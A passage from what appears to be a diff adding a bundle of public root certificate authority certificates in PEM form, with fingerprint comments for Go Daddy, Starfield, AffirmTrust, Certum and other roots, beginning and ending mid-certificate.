+scIbRTJxldn+EFvMr+eleQGPicPK8lVx93e+d5TzcqQsRNiekpsUOqHnJJAKClaO +xdgmlOHZSOEtPtoKct2jmRXagaKH9HtuJneJWK3W6wyyQXpzbm3benhB6QiIEn6H +LmYRY2xU+zydcsC8Lv/Ct90NduM61/e0aL6i9eOBbsFGb12N4E3GVFWJGjMxCrFX +uaOKmMPsOzTFlUFpfnXCPCDFYbpRR6AgkJOhkEvzTnyFRVSa0QUmQbC1TR0zvsQD +yCV8wXDbO/QJLVQnSKwv4cSsPsjLkkxTOTcj7NMB+eAJRE1NZMDhDVqHIrytG6P+ +JrUV86f8hBnp7KGItERphIPzidF0BqnMC9bC3ieFUCbKF7jJeodWLBoBHmy+E60Q +rLUk9TiRodZL2vG70t5HtfG8gfZZa88ZU+mNFctKy6lvROUbQc/hhqfK0GqfvEyN +BjNaooXlkDWgYlwWTvDjovoDGrQscbNYLN57C9saD+veIR8GdwYDsMnvmfzAuU8L +hij+0rnq49qlw0dpEuDb8PYZi+17cNcC1u2HGCgsBCRMd+RIihrGO5rUD8r6ddIB +QFqNeb+Lz0vPqhbBleStTIo+F5HUsWLlguWABKQDfo2/2n+iD5dPDNMN+9fR5XJ+ +HMh3/1uaD7euBUbl8agW7EekFwIDAQABo4H2MIHzMIGwBgNVHREEgagwgaWBD2lu +Zm9AaXplbnBlLmNvbaSBkTCBjjFHMEUGA1UECgw+SVpFTlBFIFMuQS4gLSBDSUYg +QTAxMzM3MjYwLVJNZXJjLlZpdG9yaWEtR2FzdGVpeiBUMTA1NSBGNjIgUzgxQzBB +BgNVBAkMOkF2ZGEgZGVsIE1lZGl0ZXJyYW5lbyBFdG9yYmlkZWEgMTQgLSAwMTAx +MCBWaXRvcmlhLUdhc3RlaXowDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMC +AQYwHQYDVR0OBBYEFB0cZQ6o8iV7tJHP5LGx5r1VdGwFMA0GCSqGSIb3DQEBCwUA +A4ICAQB4pgwWSp9MiDrAyw6lFn2fuUhfGI8NYjb2zRlrrKvV9pF9rnHzP7MOeIWb +laQnIUdCSnxIOvVFfLMMjlF4rJUT3sb9fbgakEyrkgPH7UIBzg/YsfqikuFgba56 +awmqxinuaElnMIAkejEWOVt+8Rwu3WwJrfIxwYJOubv5vr8qhT/AQKM6WfxZSzwo +JNu0FXWuDYi6LnPAvViH5ULy617uHjAimcs30cQhbIHsvm0m5hzkQiCeR7Csg1lw +LDXWrzY0tM07+DKo7+N4ifuNRSzanLh+QBxh5z6ikixL8s36mLYp//Pye6kfLqCT +VyvehQP5aTfLnnhqBbTFMXiJ7HqnheG5ezzevh55hM6fcA5ZwjUukCox2eRFekGk +LhObNA5me0mrZJfQRsN5nXJQY6aYWwa9SG3YOYNw6DXwBdGqvOPbyALqfP2C2sJb +UjWumDqtujWTI6cfSN01RpiyEGjkpTHCClguGYEQyVB1/OpaFs4R1+7vUIgtYf8/ +QnMFlEPVjjxOAToZpR9GTnfQXeWBIiGH/pR9hNiTrdZoQ0iy2+tzJOeRf1SktoA+ +naM8THLCV8Sg1Mw4J87VBp6iSNnpn86CcDaTmjvfliHjWbcM2pE38P1ZWrOZyGls +QyYBNWNgVYkDOnXYukrZVP/u3oDYLdE41V4tC5h9Pmzb/CaIxw== +-----END CERTIFICATE----- + +# Issuer: CN=Go Daddy Root Certificate Authority - G2 O=GoDaddy.com, Inc. +# Subject: CN=Go Daddy Root Certificate Authority - G2 O=GoDaddy.com, Inc. 
+# Label: "Go Daddy Root Certificate Authority - G2" +# Serial: 0 +# MD5 Fingerprint: 80:3a:bc:22:c1:e6:fb:8d:9b:3b:27:4a:32:1b:9a:01 +# SHA1 Fingerprint: 47:be:ab:c9:22:ea:e8:0e:78:78:34:62:a7:9f:45:c2:54:fd:e6:8b +# SHA256 Fingerprint: 45:14:0b:32:47:eb:9c:c8:c5:b4:f0:d7:b5:30:91:f7:32:92:08:9e:6e:5a:63:e2:74:9d:d3:ac:a9:19:8e:da +-----BEGIN CERTIFICATE----- +MIIDxTCCAq2gAwIBAgIBADANBgkqhkiG9w0BAQsFADCBgzELMAkGA1UEBhMCVVMx +EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoT +EUdvRGFkZHkuY29tLCBJbmMuMTEwLwYDVQQDEyhHbyBEYWRkeSBSb290IENlcnRp +ZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTA5MDkwMTAwMDAwMFoXDTM3MTIzMTIz +NTk1OVowgYMxCzAJBgNVBAYTAlVTMRAwDgYDVQQIEwdBcml6b25hMRMwEQYDVQQH +EwpTY290dHNkYWxlMRowGAYDVQQKExFHb0RhZGR5LmNvbSwgSW5jLjExMC8GA1UE +AxMoR28gRGFkZHkgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgLSBHMjCCASIw +DQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL9xYgjx+lk09xvJGKP3gElY6SKD +E6bFIEMBO4Tx5oVJnyfq9oQbTqC023CYxzIBsQU+B07u9PpPL1kwIuerGVZr4oAH +/PMWdYA5UXvl+TW2dE6pjYIT5LY/qQOD+qK+ihVqf94Lw7YZFAXK6sOoBJQ7Rnwy +DfMAZiLIjWltNowRGLfTshxgtDj6AozO091GB94KPutdfMh8+7ArU6SSYmlRJQVh +GkSBjCypQ5Yj36w6gZoOKcUcqeldHraenjAKOc7xiID7S13MMuyFYkMlNAJWJwGR +tDtwKj9useiciAF9n9T521NtYJ2/LOdYq7hfRvzOxBsDPAnrSTFcaUaz4EcCAwEA +AaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYE +FDqahQcQZyi27/a9BUFuIMGU2g/eMA0GCSqGSIb3DQEBCwUAA4IBAQCZ21151fmX +WWcDYfF+OwYxdS2hII5PZYe096acvNjpL9DbWu7PdIxztDhC2gV7+AJ1uP2lsdeu +9tfeE8tTEH6KRtGX+rcuKxGrkLAngPnon1rpN5+r5N9ss4UXnT3ZJE95kTXWXwTr +gIOrmgIttRD02JDHBHNA7XIloKmf7J6raBKZV8aPEjoJpL1E/QYVN8Gb5DKj7Tjo +2GTzLH4U/ALqn83/B2gX2yKQOC16jdFU8WnjXzPKej17CuPKf1855eJ1usV2GDPO +LPAvTK33sefOT6jEm0pUBsV/fdUID+Ic/n4XuKxe9tQWskMJDE32p2u0mYRlynqI +4uJEvlz36hz1 +-----END CERTIFICATE----- + +# Issuer: CN=Starfield Root Certificate Authority - G2 O=Starfield Technologies, Inc. +# Subject: CN=Starfield Root Certificate Authority - G2 O=Starfield Technologies, Inc. 
+# Label: "Starfield Root Certificate Authority - G2" +# Serial: 0 +# MD5 Fingerprint: d6:39:81:c6:52:7e:96:69:fc:fc:ca:66:ed:05:f2:96 +# SHA1 Fingerprint: b5:1c:06:7c:ee:2b:0c:3d:f8:55:ab:2d:92:f4:fe:39:d4:e7:0f:0e +# SHA256 Fingerprint: 2c:e1:cb:0b:f9:d2:f9:e1:02:99:3f:be:21:51:52:c3:b2:dd:0c:ab:de:1c:68:e5:31:9b:83:91:54:db:b7:f5 +-----BEGIN CERTIFICATE----- +MIID3TCCAsWgAwIBAgIBADANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMCVVMx +EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxJTAjBgNVBAoT +HFN0YXJmaWVsZCBUZWNobm9sb2dpZXMsIEluYy4xMjAwBgNVBAMTKVN0YXJmaWVs +ZCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTA5MDkwMTAwMDAw +MFoXDTM3MTIzMTIzNTk1OVowgY8xCzAJBgNVBAYTAlVTMRAwDgYDVQQIEwdBcml6 +b25hMRMwEQYDVQQHEwpTY290dHNkYWxlMSUwIwYDVQQKExxTdGFyZmllbGQgVGVj +aG5vbG9naWVzLCBJbmMuMTIwMAYDVQQDEylTdGFyZmllbGQgUm9vdCBDZXJ0aWZp +Y2F0ZSBBdXRob3JpdHkgLSBHMjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC +ggEBAL3twQP89o/8ArFvW59I2Z154qK3A2FWGMNHttfKPTUuiUP3oWmb3ooa/RMg +nLRJdzIpVv257IzdIvpy3Cdhl+72WoTsbhm5iSzchFvVdPtrX8WJpRBSiUZV9Lh1 +HOZ/5FSuS/hVclcCGfgXcVnrHigHdMWdSL5stPSksPNkN3mSwOxGXn/hbVNMYq/N +Hwtjuzqd+/x5AJhhdM8mgkBj87JyahkNmcrUDnXMN/uLicFZ8WJ/X7NfZTD4p7dN +dloedl40wOiWVpmKs/B/pM293DIxfJHP4F8R+GuqSVzRmZTRouNjWwl2tVZi4Ut0 +HZbUJtQIBFnQmA4O5t78w+wfkPECAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAO +BgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFHwMMh+n2TB/xH1oo2Kooc6rB1snMA0G +CSqGSIb3DQEBCwUAA4IBAQARWfolTwNvlJk7mh+ChTnUdgWUXuEok21iXQnCoKjU +sHU48TRqneSfioYmUeYs0cYtbpUgSpIB7LiKZ3sx4mcujJUDJi5DnUox9g61DLu3 +4jd/IroAow57UvtruzvE03lRTs2Q9GcHGcg8RnoNAX3FWOdt5oUwF5okxBDgBPfg +8n/Uqgr/Qh037ZTlZFkSIHc40zI+OIF1lnP6aI+xy84fxez6nH7PfrHxBy22/L/K +pL/QlwVKvOoYKAKQvVR4CSFx09F9HdkWsKlhPdAKACL8x3vLCWRFCztAgfd9fDL1 +mMpYjn0q7pBZc2T5NnReJaH1ZgUufzkVqSr7UIuOhWn0 +-----END CERTIFICATE----- + +# Issuer: CN=Starfield Services Root Certificate Authority - G2 O=Starfield Technologies, Inc. +# Subject: CN=Starfield Services Root Certificate Authority - G2 O=Starfield Technologies, Inc. 
+# Label: "Starfield Services Root Certificate Authority - G2" +# Serial: 0 +# MD5 Fingerprint: 17:35:74:af:7b:61:1c:eb:f4:f9:3c:e2:ee:40:f9:a2 +# SHA1 Fingerprint: 92:5a:8f:8d:2c:6d:04:e0:66:5f:59:6a:ff:22:d8:63:e8:25:6f:3f +# SHA256 Fingerprint: 56:8d:69:05:a2:c8:87:08:a4:b3:02:51:90:ed:cf:ed:b1:97:4a:60:6a:13:c6:e5:29:0f:cb:2a:e6:3e:da:b5 +-----BEGIN CERTIFICATE----- +MIID7zCCAtegAwIBAgIBADANBgkqhkiG9w0BAQsFADCBmDELMAkGA1UEBhMCVVMx +EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxJTAjBgNVBAoT +HFN0YXJmaWVsZCBUZWNobm9sb2dpZXMsIEluYy4xOzA5BgNVBAMTMlN0YXJmaWVs +ZCBTZXJ2aWNlcyBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTA5 +MDkwMTAwMDAwMFoXDTM3MTIzMTIzNTk1OVowgZgxCzAJBgNVBAYTAlVTMRAwDgYD +VQQIEwdBcml6b25hMRMwEQYDVQQHEwpTY290dHNkYWxlMSUwIwYDVQQKExxTdGFy +ZmllbGQgVGVjaG5vbG9naWVzLCBJbmMuMTswOQYDVQQDEzJTdGFyZmllbGQgU2Vy +dmljZXMgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgLSBHMjCCASIwDQYJKoZI +hvcNAQEBBQADggEPADCCAQoCggEBANUMOsQq+U7i9b4Zl1+OiFOxHz/Lz58gE20p +OsgPfTz3a3Y4Y9k2YKibXlwAgLIvWX/2h/klQ4bnaRtSmpDhcePYLQ1Ob/bISdm2 +8xpWriu2dBTrz/sm4xq6HZYuajtYlIlHVv8loJNwU4PahHQUw2eeBGg6345AWh1K +Ts9DkTvnVtYAcMtS7nt9rjrnvDH5RfbCYM8TWQIrgMw0R9+53pBlbQLPLJGmpufe +hRhJfGZOozptqbXuNC66DQO4M99H67FrjSXZm86B0UVGMpZwh94CDklDhbZsc7tk +6mFBrMnUVN+HL8cisibMn1lUaJ/8viovxFUcdUBgF4UCVTmLfwUCAwEAAaNCMEAw +DwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFJxfAN+q +AdcwKziIorhtSpzyEZGDMA0GCSqGSIb3DQEBCwUAA4IBAQBLNqaEd2ndOxmfZyMI +bw5hyf2E3F/YNoHN2BtBLZ9g3ccaaNnRbobhiCPPE95Dz+I0swSdHynVv/heyNXB +ve6SbzJ08pGCL72CQnqtKrcgfU28elUSwhXqvfdqlS5sdJ/PHLTyxQGjhdByPq1z +qwubdQxtRbeOlKyWN7Wg0I8VRw7j6IPdj/3vQQF3zCepYoUz8jcI73HPdwbeyBkd +iEDPfUYd/x7H4c7/I9vG+o1VTqkC50cRRj70/b17KSa7qWFiNyi2LSr2EIZkyXCn +0q23KXB56jzaYyWf/Wi3MOxw+3WKt21gZ7IeyLnp2KhvAotnDU0mV3HaIPzBSlCN +sSi6 +-----END CERTIFICATE----- + +# Issuer: CN=AffirmTrust Commercial O=AffirmTrust +# Subject: CN=AffirmTrust Commercial O=AffirmTrust +# Label: "AffirmTrust Commercial" +# Serial: 8608355977964138876 +# MD5 Fingerprint: 82:92:ba:5b:ef:cd:8a:6f:a6:3d:55:f9:84:f6:d6:b7 +# SHA1 Fingerprint: f9:b5:b6:32:45:5f:9c:be:ec:57:5f:80:dc:e9:6e:2c:c7:b2:78:b7 +# SHA256 Fingerprint: 03:76:ab:1d:54:c5:f9:80:3c:e4:b2:e2:01:a0:ee:7e:ef:7b:57:b6:36:e8:a9:3c:9b:8d:48:60:c9:6f:5f:a7 +-----BEGIN CERTIFICATE----- +MIIDTDCCAjSgAwIBAgIId3cGJyapsXwwDQYJKoZIhvcNAQELBQAwRDELMAkGA1UE +BhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MR8wHQYDVQQDDBZBZmZpcm1UcnVz +dCBDb21tZXJjaWFsMB4XDTEwMDEyOTE0MDYwNloXDTMwMTIzMTE0MDYwNlowRDEL +MAkGA1UEBhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MR8wHQYDVQQDDBZBZmZp +cm1UcnVzdCBDb21tZXJjaWFsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC +AQEA9htPZwcroRX1BiLLHwGy43NFBkRJLLtJJRTWzsO3qyxPxkEylFf6EqdbDuKP +Hx6GGaeqtS25Xw2Kwq+FNXkyLbscYjfysVtKPcrNcV/pQr6U6Mje+SJIZMblq8Yr +ba0F8PrVC8+a5fBQpIs7R6UjW3p6+DM/uO+Zl+MgwdYoic+U+7lF7eNAFxHUdPAL +MeIrJmqbTFeurCA+ukV6BfO9m2kVrn1OIGPENXY6BwLJN/3HR+7o8XYdcxXyl6S1 +yHp52UKqK39c/s4mT6NmgTWvRLpUHhwwMmWd5jyTXlBOeuM61G7MGvv50jeuJCqr +VwMiKA1JdX+3KNp1v47j3A55MQIDAQABo0IwQDAdBgNVHQ4EFgQUnZPGU4teyq8/ +nx4P5ZmVvCT2lI8wDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwDQYJ +KoZIhvcNAQELBQADggEBAFis9AQOzcAN/wr91LoWXym9e2iZWEnStB03TX8nfUYG +XUPGhi4+c7ImfU+TqbbEKpqrIZcUsd6M06uJFdhrJNTxFq7YpFzUf1GO7RgBsZNj +vbz4YYCanrHOQnDiqX0GJX0nof5v7LMeJNrjS1UaADs1tDvZ110w/YETifLCBivt +Z8SOyUOyXGsViQK8YvxO8rUzqrJv0wqiUOP2O+guRMLbZjipM1ZI8W0bM40NjD9g +N53Tym1+NH4Nn3J2ixufcv1SNUFFApYvHLKac0khsUlHRUe072o0EclNmsxZt9YC +nlpOZbWUrhvfKbAW8b8Angc6F2S1BLUjIZkKlTuXfO8= +-----END CERTIFICATE----- + +# Issuer: CN=AffirmTrust Networking O=AffirmTrust +# Subject: CN=AffirmTrust Networking 
O=AffirmTrust +# Label: "AffirmTrust Networking" +# Serial: 8957382827206547757 +# MD5 Fingerprint: 42:65:ca:be:01:9a:9a:4c:a9:8c:41:49:cd:c0:d5:7f +# SHA1 Fingerprint: 29:36:21:02:8b:20:ed:02:f5:66:c5:32:d1:d6:ed:90:9f:45:00:2f +# SHA256 Fingerprint: 0a:81:ec:5a:92:97:77:f1:45:90:4a:f3:8d:5d:50:9f:66:b5:e2:c5:8f:cd:b5:31:05:8b:0e:17:f3:f0:b4:1b +-----BEGIN CERTIFICATE----- +MIIDTDCCAjSgAwIBAgIIfE8EORzUmS0wDQYJKoZIhvcNAQEFBQAwRDELMAkGA1UE +BhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MR8wHQYDVQQDDBZBZmZpcm1UcnVz +dCBOZXR3b3JraW5nMB4XDTEwMDEyOTE0MDgyNFoXDTMwMTIzMTE0MDgyNFowRDEL +MAkGA1UEBhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MR8wHQYDVQQDDBZBZmZp +cm1UcnVzdCBOZXR3b3JraW5nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC +AQEAtITMMxcua5Rsa2FSoOujz3mUTOWUgJnLVWREZY9nZOIG41w3SfYvm4SEHi3y +YJ0wTsyEheIszx6e/jarM3c1RNg1lho9Nuh6DtjVR6FqaYvZ/Ls6rnla1fTWcbua +kCNrmreIdIcMHl+5ni36q1Mr3Lt2PpNMCAiMHqIjHNRqrSK6mQEubWXLviRmVSRL +QESxG9fhwoXA3hA/Pe24/PHxI1Pcv2WXb9n5QHGNfb2V1M6+oF4nI979ptAmDgAp +6zxG8D1gvz9Q0twmQVGeFDdCBKNwV6gbh+0t+nvujArjqWaJGctB+d1ENmHP4ndG +yH329JKBNv3bNPFyfvMMFr20FQIDAQABo0IwQDAdBgNVHQ4EFgQUBx/S55zawm6i +QLSwelAQUHTEyL0wDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwDQYJ +KoZIhvcNAQEFBQADggEBAIlXshZ6qML91tmbmzTCnLQyFE2npN/svqe++EPbkTfO +tDIuUFUaNU52Q3Eg75N3ThVwLofDwR1t3Mu1J9QsVtFSUzpE0nPIxBsFZVpikpzu +QY0x2+c06lkh1QF612S4ZDnNye2v7UsDSKegmQGA3GWjNq5lWUhPgkvIZfFXHeVZ +Lgo/bNjR9eUJtGxUAArgFU2HdW23WJZa3W3SAKD0m0i+wzekujbgfIeFlxoVot4u +olu9rxj5kFDNcFn4J2dHy8egBzp90SxdbBk6ZrV9/ZFvgrG+CJPbFEfxojfHRZ48 +x3evZKiT3/Zpg4Jg8klCNO1aAFSFHBY2kgxc+qatv9s= +-----END CERTIFICATE----- + +# Issuer: CN=AffirmTrust Premium O=AffirmTrust +# Subject: CN=AffirmTrust Premium O=AffirmTrust +# Label: "AffirmTrust Premium" +# Serial: 7893706540734352110 +# MD5 Fingerprint: c4:5d:0e:48:b6:ac:28:30:4e:0a:bc:f9:38:16:87:57 +# SHA1 Fingerprint: d8:a6:33:2c:e0:03:6f:b1:85:f6:63:4f:7d:6a:06:65:26:32:28:27 +# SHA256 Fingerprint: 70:a7:3f:7f:37:6b:60:07:42:48:90:45:34:b1:14:82:d5:bf:0e:69:8e:cc:49:8d:f5:25:77:eb:f2:e9:3b:9a +-----BEGIN CERTIFICATE----- +MIIFRjCCAy6gAwIBAgIIbYwURrGmCu4wDQYJKoZIhvcNAQEMBQAwQTELMAkGA1UE +BhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MRwwGgYDVQQDDBNBZmZpcm1UcnVz +dCBQcmVtaXVtMB4XDTEwMDEyOTE0MTAzNloXDTQwMTIzMTE0MTAzNlowQTELMAkG +A1UEBhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MRwwGgYDVQQDDBNBZmZpcm1U +cnVzdCBQcmVtaXVtMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxBLf +qV/+Qd3d9Z+K4/as4Tx4mrzY8H96oDMq3I0gW64tb+eT2TZwamjPjlGjhVtnBKAQ +JG9dKILBl1fYSCkTtuG+kU3fhQxTGJoeJKJPj/CihQvL9Cl/0qRY7iZNyaqoe5rZ ++jjeRFcV5fiMyNlI4g0WJx0eyIOFJbe6qlVBzAMiSy2RjYvmia9mx+n/K+k8rNrS +s8PhaJyJ+HoAVt70VZVs+7pk3WKL3wt3MutizCaam7uqYoNMtAZ6MMgpv+0GTZe5 +HMQxK9VfvFMSF5yZVylmd2EhMQcuJUmdGPLu8ytxjLW6OQdJd/zvLpKQBY0tL3d7 +70O/Nbua2Plzpyzy0FfuKE4mX4+QaAkvuPjcBukumj5Rp9EixAqnOEhss/n/fauG +V+O61oV4d7pD6kh/9ti+I20ev9E2bFhc8e6kGVQa9QPSdubhjL08s9NIS+LI+H+S +qHZGnEJlPqQewQcDWkYtuJfzt9WyVSHvutxMAJf7FJUnM7/oQ0dG0giZFmA7mn7S +5u046uwBHjxIVkkJx0w3AJ6IDsBz4W9m6XJHMD4Q5QsDyZpCAGzFlH5hxIrff4Ia +C1nEWTJ3s7xgaVY5/bQGeyzWZDbZvUjthB9+pSKPKrhC9IK31FOQeE4tGv2Bb0TX +OwF0lkLgAOIua+rF7nKsu7/+6qqo+Nz2snmKtmcCAwEAAaNCMEAwHQYDVR0OBBYE +FJ3AZ6YMItkm9UWrpmVSESfYRaxjMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/ +BAQDAgEGMA0GCSqGSIb3DQEBDAUAA4ICAQCzV00QYk465KzquByvMiPIs0laUZx2 +KI15qldGF9X1Uva3ROgIRL8YhNILgM3FEv0AVQVhh0HctSSePMTYyPtwni94loMg +Nt58D2kTiKV1NpgIpsbfrM7jWNa3Pt668+s0QNiigfV4Py/VpfzZotReBA4Xrf5B +8OWycvpEgjNC6C1Y91aMYj+6QrCcDFx+LmUmXFNPALJ4fqENmS2NuB2OosSw/WDQ +MKSOyARiqcTtNd56l+0OOF6SL5Nwpamcb6d9Ex1+xghIsV5n61EIJenmJWtSKZGc +0jlzCFfemQa0W50QBuHCAKi4HEoCChTQwUHK+4w1IX2COPKpVJEZNZOUbWo6xbLQ 
+u4mGk+ibyQ86p3q4ofB4Rvr8Ny/lioTz3/4E2aFooC8k4gmVBtWVyuEklut89pMF +u+1z6S3RdTnX5yTb2E5fQ4+e0BQ5v1VwSJlXMbSc7kqYA5YwH2AG7hsj/oFgIxpH +YoWlzBk0gG+zrBrjn/B7SK3VAdlntqlyk+otZrWyuOQ9PLLvTIzq6we/qzWaVYa8 +GKa1qF60g2xraUDTn9zxw2lrueFtCfTxqlB2Cnp9ehehVZZCmTEJ3WARjQUwfuaO +RtGdFNrHF+QFlozEJLUbzxQHskD4o55BhrwE0GuWyCqANP2/7waj3VjFhT0+j/6e +KeC2uAloGRwYQw== +-----END CERTIFICATE----- + +# Issuer: CN=AffirmTrust Premium ECC O=AffirmTrust +# Subject: CN=AffirmTrust Premium ECC O=AffirmTrust +# Label: "AffirmTrust Premium ECC" +# Serial: 8401224907861490260 +# MD5 Fingerprint: 64:b0:09:55:cf:b1:d5:99:e2:be:13:ab:a6:5d:ea:4d +# SHA1 Fingerprint: b8:23:6b:00:2f:1d:16:86:53:01:55:6c:11:a4:37:ca:eb:ff:c3:bb +# SHA256 Fingerprint: bd:71:fd:f6:da:97:e4:cf:62:d1:64:7a:dd:25:81:b0:7d:79:ad:f8:39:7e:b4:ec:ba:9c:5e:84:88:82:14:23 +-----BEGIN CERTIFICATE----- +MIIB/jCCAYWgAwIBAgIIdJclisc/elQwCgYIKoZIzj0EAwMwRTELMAkGA1UEBhMC +VVMxFDASBgNVBAoMC0FmZmlybVRydXN0MSAwHgYDVQQDDBdBZmZpcm1UcnVzdCBQ +cmVtaXVtIEVDQzAeFw0xMDAxMjkxNDIwMjRaFw00MDEyMzExNDIwMjRaMEUxCzAJ +BgNVBAYTAlVTMRQwEgYDVQQKDAtBZmZpcm1UcnVzdDEgMB4GA1UEAwwXQWZmaXJt +VHJ1c3QgUHJlbWl1bSBFQ0MwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQNMF4bFZ0D +0KF5Nbc6PJJ6yhUczWLznCZcBz3lVPqj1swS6vQUX+iOGasvLkjmrBhDeKzQN8O9 +ss0s5kfiGuZjuD0uL3jET9v0D6RoTFVya5UdThhClXjMNzyR4ptlKymjQjBAMB0G +A1UdDgQWBBSaryl6wBE1NSZRMADDav5A1a7WPDAPBgNVHRMBAf8EBTADAQH/MA4G +A1UdDwEB/wQEAwIBBjAKBggqhkjOPQQDAwNnADBkAjAXCfOHiFBar8jAQr9HX/Vs +aobgxCd05DhT1wV/GzTjxi+zygk8N53X57hG8f2h4nECMEJZh0PUUd+60wkyWs6I +flc9nF9Ca/UHLbXwgpP5WW+uZPpY5Yse42O+tYHNbwKMeQ== +-----END CERTIFICATE----- + +# Issuer: CN=Certum Trusted Network CA O=Unizeto Technologies S.A. OU=Certum Certification Authority +# Subject: CN=Certum Trusted Network CA O=Unizeto Technologies S.A. OU=Certum Certification Authority +# Label: "Certum Trusted Network CA" +# Serial: 279744 +# MD5 Fingerprint: d5:e9:81:40:c5:18:69:fc:46:2c:89:75:62:0f:aa:78 +# SHA1 Fingerprint: 07:e0:32:e0:20:b7:2c:3f:19:2f:06:28:a2:59:3a:19:a7:0f:06:9e +# SHA256 Fingerprint: 5c:58:46:8d:55:f5:8e:49:7e:74:39:82:d2:b5:00:10:b6:d1:65:37:4a:cf:83:a7:d4:a3:2d:b7:68:c4:40:8e +-----BEGIN CERTIFICATE----- +MIIDuzCCAqOgAwIBAgIDBETAMA0GCSqGSIb3DQEBBQUAMH4xCzAJBgNVBAYTAlBM +MSIwIAYDVQQKExlVbml6ZXRvIFRlY2hub2xvZ2llcyBTLkEuMScwJQYDVQQLEx5D +ZXJ0dW0gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkxIjAgBgNVBAMTGUNlcnR1bSBU +cnVzdGVkIE5ldHdvcmsgQ0EwHhcNMDgxMDIyMTIwNzM3WhcNMjkxMjMxMTIwNzM3 +WjB+MQswCQYDVQQGEwJQTDEiMCAGA1UEChMZVW5pemV0byBUZWNobm9sb2dpZXMg +Uy5BLjEnMCUGA1UECxMeQ2VydHVtIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MSIw +IAYDVQQDExlDZXJ0dW0gVHJ1c3RlZCBOZXR3b3JrIENBMIIBIjANBgkqhkiG9w0B +AQEFAAOCAQ8AMIIBCgKCAQEA4/t9o3K6wvDJFIf1awFO4W5AB7ptJ11/91sts1rH +UV+rpDKmYYe2bg+G0jACl/jXaVehGDldamR5xgFZrDwxSjh80gTSSyjoIF87B6LM +TXPb865Px1bVWqeWifrzq2jUI4ZZJ88JJ7ysbnKDHDBy3+Ci6dLhdHUZvSqeexVU +BBvXQzmtVSjF4hq79MDkrjhJM8x2hZ85RdKknvISjFH4fOQtf/WsX+sWn7Et0brM +kUJ3TCXJkDhv2/DM+44el1k+1WBO5gUo7Ul5E0u6SNsv+XLTOcr+H9g0cvW0QM8x +AcPs3hEtF10fuFDRXhmnad4HMyjKUJX5p1TLVIZQRan5SQIDAQABo0IwQDAPBgNV +HRMBAf8EBTADAQH/MB0GA1UdDgQWBBQIds3LB/8k9sXN7buQvOKEN0Z19zAOBgNV +HQ8BAf8EBAMCAQYwDQYJKoZIhvcNAQEFBQADggEBAKaorSLOAT2mo/9i0Eidi15y +sHhE49wcrwn9I0j6vSrEuVUEtRCjjSfeC4Jj0O7eDDd5QVsisrCaQVymcODU0HfL +I9MA4GxWL+FpDQ3Zqr8hgVDZBqWo/5U30Kr+4rP1mS1FhIrlQgnXdAIv94nYmem8 +J9RHjboNRhx3zxSkHLmkMcScKHQDNP8zGSal6Q10tz6XxnboJ5ajZt3hrvJBW8qY +VoNzcOSGGtIxQbovvi0TWnZvTuhOgQ4/WwMioBK+ZlgRSssDxLQqKi2WF+A5VLxI +03YnnZotBqbJ7DnSq9ufmgsnAjUpsUCV5/nonFWIGUbWtzT1fs45mtk48VH3Tyw= +-----END CERTIFICATE----- + +# Issuer: CN=TWCA Root Certification Authority O=TAIWAN-CA 
OU=Root CA +# Subject: CN=TWCA Root Certification Authority O=TAIWAN-CA OU=Root CA +# Label: "TWCA Root Certification Authority" +# Serial: 1 +# MD5 Fingerprint: aa:08:8f:f6:f9:7b:b7:f2:b1:a7:1e:9b:ea:ea:bd:79 +# SHA1 Fingerprint: cf:9e:87:6d:d3:eb:fc:42:26:97:a3:b5:a3:7a:a0:76:a9:06:23:48 +# SHA256 Fingerprint: bf:d8:8f:e1:10:1c:41:ae:3e:80:1b:f8:be:56:35:0e:e9:ba:d1:a6:b9:bd:51:5e:dc:5c:6d:5b:87:11:ac:44 +-----BEGIN CERTIFICATE----- +MIIDezCCAmOgAwIBAgIBATANBgkqhkiG9w0BAQUFADBfMQswCQYDVQQGEwJUVzES +MBAGA1UECgwJVEFJV0FOLUNBMRAwDgYDVQQLDAdSb290IENBMSowKAYDVQQDDCFU +V0NBIFJvb3QgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMDgwODI4MDcyNDMz +WhcNMzAxMjMxMTU1OTU5WjBfMQswCQYDVQQGEwJUVzESMBAGA1UECgwJVEFJV0FO +LUNBMRAwDgYDVQQLDAdSb290IENBMSowKAYDVQQDDCFUV0NBIFJvb3QgQ2VydGlm 